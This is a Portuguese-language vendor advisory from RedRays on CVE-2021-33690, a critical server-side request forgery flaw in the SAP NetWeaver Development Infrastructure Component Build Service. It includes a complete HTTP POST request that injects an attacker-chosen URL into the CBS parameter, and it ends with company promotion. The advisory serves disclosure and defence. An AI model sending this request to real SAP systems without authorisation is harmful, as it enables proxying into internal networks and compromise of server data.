
[CVE-2021-33690] Vulnerabilidade de Server Side Request Forgery em SAP NetWeaver Development Infrastructure
[CVE-2021-33690] Vulnerabilidade de Server-Side Request Forgery no SAP NetWeaver Development Infrastructure
Aplicação: SAP NetWeaver AS Java
Versões Afetadas: SAP NetWeaver Development Infrastructure Component Build Service versões – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
URL do Fornecedor: https://sap.com/
Bug: SSRF
Data do Comunicado Público: 1 de junho de 2023
Referência: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
Nota SAP: 3072955
Correções Aprovadas pela SAP: Sim
Status: analisado e publicado
INFORMAÇÕES DO ADVISORY Título: [CVE-2021-33690] Vulnerabilidade de Server-Side Request Forgery no SAP NetWeaver Development Infrastructure Risco: Crítico URL do Advisory: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/ Data de publicação: 1 de junho de 2023
INFORMAÇÕES DA VULNERABILIDADE Explorável Remotamente: Sim Explorável Localmente: Não
Informações CVSS Pontuação Base CVSS v3.1: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
DESCRIÇÃO DA VULNERABILIDADE Uma vulnerabilidade conhecida como Server-Side Request Forgery (SSRF) foi identificada em várias versões do SAP NetWeaver Development Infrastructure Component Build Service, especificamente 7.11, 7.20, 7.30, 7.31, 7.40 e 7.50. Essa fragilidade no SAP NetWeaver Development Infrastructure Component Build Service concede a um atacante, que possui acesso ao servidor, a capacidade de executar ataques de proxy por meio de consultas especialmente elaboradas. As consequências de tais ataques podem levar ao comprometimento total de dados sensíveis do servidor, afetando sua acessibilidade. É crucial notar que a gravidade dessa vulnerabilidade depende de o SAP NetWeaver Development Infrastructure (NWDI) operar na intranet ou na internet. A pontuação CVSS foi calculada com base no pior cenário, que pressupõe que o sistema opera online.
DESCRIÇÃO TÉCNICA
Para determinar se o servidor está vulnerável a SSRF, envie a seguinte requisição:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1 Host: redrayssap:50000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
Se a seguinte resposta for recebida, isso indica a presença da vulnerabilidade:
Could not connect to the CBS.Sobre a RedRays A RedRays é uma empresa de cibersegurança de primeira linha que protege sistemas ERP contra atividades fraudulentas internas e ameaças cibernéticas externas. Nos orgulhamos em oferecer soluções de segurança robustas para grandes corporações e provedores de serviços gerenciados que dependem de grandes sistemas ERP como SAP, Oracle e Microsoft. Utilizando ferramentas e estratégias avançadas, supervisionamos e controlamos proativamente a segurança em ambientes SAP extensos em todo o mundo.
Nosso objetivo principal é preencher a lacuna de segurança tanto do ponto de vista técnico quanto de negócios, garantindo as operações ininterruptas dos nossos clientes e protegendo seus dados valiosos. Na RedRays, estamos comprometidos em manter os mais altos padrões de segurança, ao mesmo tempo em que oferecemos serviço e suporte extraordinários ao cliente.
Sobre a P&D da RedRays A pedra angular das conquistas da RedRays está na nossa unidade de pesquisa e desenvolvimento (P&D), especializada em estudar e analisar vulnerabilidades em aplicações corporativas essenciais. Nossas iniciativas de P&D conquistaram reconhecimento e admiração de empresas de software líderes, como SAP, Oracle, Microsoft Dynamics e IBM. Essa dedicação à pesquisa nos permite antecipar ameaças emergentes e criar soluções de segurança personalizadas que atendem às necessidades dos nossos clientes.
Nossa equipe é composta por profissionais experientes com conjuntos diversificados de habilidades que abrangem vários domínios de segurança, como avaliação de vulnerabilidades, testes de penetração, gerenciamento de incidentes e inteligência de ameaças. Nosso compromisso é realizar pesquisas rigorosas e entregar soluções vanguardistas para fortalecer os sistemas SAP contra ameaças em constante evolução.
Para qualquer dúvida ou mais detalhes, não hesite em entrar em contato: